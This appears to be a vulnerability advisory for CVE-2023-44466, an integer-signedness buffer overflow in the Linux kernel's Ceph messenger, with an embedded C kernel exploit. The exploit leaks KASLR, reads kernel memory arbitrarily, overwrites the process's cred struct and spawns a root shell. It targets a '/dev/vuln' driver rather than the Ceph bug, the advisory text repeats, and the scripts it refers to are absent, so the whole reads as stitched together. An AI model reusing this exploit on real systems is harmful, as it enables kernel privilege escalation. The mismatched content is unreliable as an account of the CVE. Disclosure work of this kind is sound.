The Ceph filesystem has a Linux kernel module that receives TCP packets from an IP address.
Before any authorization is completed, any device with that IP address can send a packet that results in a buffer overflow in the kernel - a user controlled length is read from a TCP packet(ceph_decode_32(&p) in the link): https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L520.
This u32 is cast into an integer(fd_lens has type int) which can result in a negative value making the checks on fd_lens validity pass.
Moderate - An attacker being able to identify the IP of a device reading the ceph file system can result in a denial of service and remote code execution in the kernel.
and then running this command within the VM with the address of the device running hte python script
will result in a KASAN dump.
#define _GNU_SOURCE /* Bring REG_XXX names from /usr/include/sys/ucontext.h */
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include "leak.h"
#define DRV_PATH "/dev/vuln"
#define PWN_GET 28673
#define SE_PATH "/sys/fs/selinux/policy"
#define TASK_NAME "th3lsh3ll"
#define TASK_OFFSET 1112
#define NAME_OFFSET 1848
#define CRED_OFFSET 1824
#define CRED_SIZE 176
#define MMAP_ADDR 0xdead1000
struct in {
int fd_len;
int pad;
unsigned long actual[2];
unsigned long size;
unsigned long addr;
unsigned long in_buf[8];
};
void* page;
struct in_write {
int fd_len;
int pad;
unsigned long actual[2];
unsigned long next_alloc[2];
unsigned long in_buf[8];
};
int drv_fd = 0;
int se_fd = 0;
void bad_fd() {
fprintf(stderr, "%s invalid driver fd %d\n", strerror(errno), drv_fd);
}
struct in* good = NULL;
struct in* kleak = NULL;
struct in_write* kw = NULL;
unsigned long kaslr_offset = 0;
unsigned long kmalloc8 = 0;
void free_all() {
if(drv_fd) {
read(drv_fd, 0, 0);
} else {
bad_fd();
}
}
void alloc() {
if(drv_fd) {
if(ioctl(drv_fd, 0, good)<0) {
fprintf(stderr, "ioctl failed spraying kmalloc16\n");
}
} else {
bad_fd();
}
}
void alloc_overflow(void* evil, int overflow) {
if(drv_fd) {
int cmd = overflow ? PWN_GET : 0;
if(ioctl(drv_fd, cmd, evil) < 0) {
fprintf(stderr, "leaking KASLR ioctl failed\n");
}
} else {
bad_fd();
}
}
// before triggering #DB exception make a SIGTRAP handler
extern char mayfault_insn_pre[];
extern char mayfault_insn_post[];
void sigtrap_handler(int signum, siginfo_t *info, void *uctx_) {
ucontext_t *uctx = uctx_;
if(uctx->uc_mcontext.gregs[REG_RIP] != (unsigned long)mayfault_insn_post) {
printf("fault at unknown RIP 0x%lx, expected 0x%lx\n", (unsigned long)uctx->uc_mcontext.gregs[REG_RIP], (unsigned long)mayfault_insn_pre);
if(signal(SIGTRAP, SIG_DFL) == SIG_ERR) {
fprintf(stderr, "signal failed %s\n", strerror(errno));
}
}
}
void trigger_DB() {
asm volatile(
"mayfault_insn_pre:\n\t"
"int1\n"
"mayfault_insn_post:\n\t"
);
}
// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
if(sched_setaffinity(pid, sizeof(cpu_set_t), &cset)) {
fprintf(stderr, "sched_setaffinity %s\n", strerror(errno));
}
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }
void alloc_plm() { if(!se_fd) { se_fd = open(SE_PATH, O_RDONLY); } }
void free_plm() { close(se_fd); se_fd = 0; }
int plm_hole = 32;
#define NUM_PRCTLS PAGE_SIZE
void * address[NUM_PRCTLS];
int rename_vma(void* addr, unsigned long size, char *name) {
int res;
res = prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, (unsigned long)addr, size, name);
if (res < 0) {
fprintf(stderr, "[!] prctl %s 0x%lx %ld\n", strerror(errno), addr, size);
exit(1);
}
return res;
}
void alloc_vmans(size_t idx) {
address[idx] =
mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
char buf[12];
memset(buf, 'a', 12);
char store[8];
memset(store, 'a', 8);
snprintf(store, 8, "%d", idx+1);
memcpy(&buf[4], store, 8);
rename_vma(address[idx], 1024, buf);
}
void free_vmans(size_t idx) {
rename_vma(address[idx], 1024, NULL);
munmap(address[idx], 1024);
}
unsigned long* arb_read(unsigned long addr, unsigned long bytes) {
unsigned long* leak = (unsigned long*)calloc((size_t)bytes, sizeof(unsigned long));
kleak->addr = addr;
kleak->size = bytes;
lseek(se_fd, SEEK_SET, 0);
free_all();
alloc_overflow(kleak, 1);
int nbytes = read(se_fd, leak, kleak->size);
if(nbytes < 0) {
fprintf(stderr, "arb_read: error reading %s\n", strerror(errno));
return 0;
}
return leak;
}
void setup_kaslr_leak() {
// pin to cpu and set SIGTRAP handler so we can trigger DB exception
pin_to(0);
struct sigaction sigtrap_action = {
.sa_sigaction = sigtrap_handler,
.sa_flags = SA_SIGINFO
};
int ret = sigaction(SIGTRAP, &sigtrap_action, NULL);
if(ret < 0) {
fprintf(stderr, "sigaction failed %d %s\n", ret, strerror(errno));
}
// read kernel pointers
trigger_DB();
}
unsigned long kaslr_leak() {
char* ans = (char*)arb_read(0xfffffe000000f000, PAGE_SIZE*2);
// calculate KASLR offset
char* first_leak = ans+0x1f48;
unsigned long kptr =(*(unsigned long*)first_leak);
if(!*first_leak || kptr < 0xffffffff81e0124d) {
fprintf(stderr, "[!] either leak failed or KASLR disabled\n");
}
kaslr_offset = kptr - 0xffffffff81e0124d;
return kaslr_offset;
}
void warm_heap() {
puts("[*] warming heap");
for(size_t i=0; i<256; i++) {
alloc_vmans(i);
}
for(size_t i=0; i<256; i++) {
free_vmans(i);
}
}
int main(char argc, char** argv) {
setup_kaslr_leak();
// set process name so we can find it in task_struct linked list
if(prctl(PR_SET_NAME, TASK_NAME, 0, 0, 0)) {
fprintf(stderr, "prctl failed to set process name: %s\n", strerror(errno));
return 1;
}
good = (struct in*)calloc(1, sizeof(struct in));
good->fd_len = 16;
// open driver
drv_fd = open(DRV_PATH, O_RDWR);
if(drv_fd < 0) {
fprintf(stderr, "%s driver device not available\n", strerror(errno));
return 1;
}
// leaking cred struct for current process task_struct by traversing task list starting
// from init_task
kleak = (struct in*)calloc(1, sizeof(struct in));
char* leak = (char*)calloc(PAGE_SIZE, sizeof(char));
kleak->fd_len = -20;
unsigned long credptr = 0x42424242;
char pname[9];
pname[8] = 0;
warm_heap();
// make the SELinuxfs plm struct adjacent in memory to victim chunk
// so we can overflow the size and address to copy to userspace
alloc_vmans(1);
alloc_vmans(0);
free_vmans(0);
alloc_overflow(good, 0);
free_vmans(1);
alloc_plm();
kaslr_offset = kaslr_leak();
printf("[*] KASLR offset 0x%lx\n", kaslr_offset);
unsigned long init_task = 0xffffffff828149c0+kaslr_offset;
unsigned long current = init_task;
while(1) {
current = (*(arb_read(current+TASK_OFFSET, 8))) - TASK_OFFSET;
*(unsigned long*)pname = (*(arb_read(current + NAME_OFFSET, 8)));
//printf("process name %s\n", pname);
if(strchr(pname, '|')) {
// regular SELinux reads as pipe if overflow fails to happen
break;
}
if(!strncmp(TASK_NAME, pname, 8)) {
printf("[*] 0x%lx current\n", current);
unsigned long* addr = arb_read(current+CRED_OFFSET, 8);
credptr = *addr;
addr = arb_read(*addr, CRED_SIZE);
printf("[*] current->real_cred: 0x%lx\n", credptr);
hex_dump((char*)addr, CRED_SIZE);
break;
}
if(init_task == current) {
puts("failed");
break;
}
}
alloc_vmans(0);
alloc_vmans(1);
free_vmans(0);
free_vmans(1);
kw = (struct in_write*)calloc(1, sizeof(struct in_write));
kw->fd_len = -20;
// start at fsid since it has 0x0s after it
// once it gets overwritten with 0 do the next field with the same
// freelist overwrite
// key thing to remember is offset is size of heap chunk divided by 2
// and last_chunk + offset
kw->next_alloc[1] = credptr+32;
alloc_overflow(kw, 1);
for(size_t j=0; j<3; j++) {
// allocate a chunk at the overwritten address
// then write all zeroes to it
alloc_overflow(good, 0);
}
// repeat for all the fields in the top of
// the struct cred
for(size_t i=0; i<5; i++) {
warm_heap();
alloc_vmans(0);
alloc_vmans(1);
free_vmans(0);
free_vmans(1);
kw->next_alloc[1] -= 8;
alloc_overflow(kw, 1);
for(size_t j=0; j<3; j++) {
alloc_overflow(good, 0);
}
}
if((getuid() == 0) && (geteuid() == 0)) {
system("/bin/sh");
} else {
puts("[!] nooo failed\n");
}
if (fork()) {
return 0;
} else {
//hold the fd for SELinuxFS file so the overwritten pointer is not freed
//since this causes a kernel panic
while(1) { sleep(1000); }
}
return 0;
}
Summary
The Ceph filesystem has a Linux kernel module that receives TCP packets from an IP address.
Before any authorization is completed, any device with that IP address can send a packet that results in a buffer overflow in the kernel - a user controlled length is read from a TCP packet(ceph_decode_32(&p) in the link): https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L520.
This u32 is cast into an integer(fd_lens has type int) which can result in a negative value making the checks on fd_lens validity pass.
Then this integer is used to calculate the size of a buffer here https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1698. The attacker can make the head_len any value - for an overflow to happen the attacker could give a value less than the number of bytes to be copied in here: https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1711. Here con->v2.in_buf is also user controlled.
Severity
Moderate - An attacker being able to identify the IP of a device reading the ceph file system can result in a denial of service and remote code execution in the kernel.
Proof of Concept
Create a linux kernel qemu VM following these steps: https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md#image
Create 2 other disk images, compile the linux kernel, and then run qemu:
The bigdisk.img should be about 50GB and the other two at least 10GB
Within the qemu VM install ceph using this link https://docs.ceph.com/en/latest/install/index_manual/ or the shell script below:
By executing this script locally to send the packet:
and then running this command within the VM with the address of the device running hte python script
mount -t ceph <ip address>:/ /mnt/mycephfs/ -o ms_mode=crc,name=foo
will result in a KASAN dump.
CVE-2023-44466
Timeline
Date reported: 07/05/2023
Date fixed: 07/12/2023
Date disclosed: 8/30/2023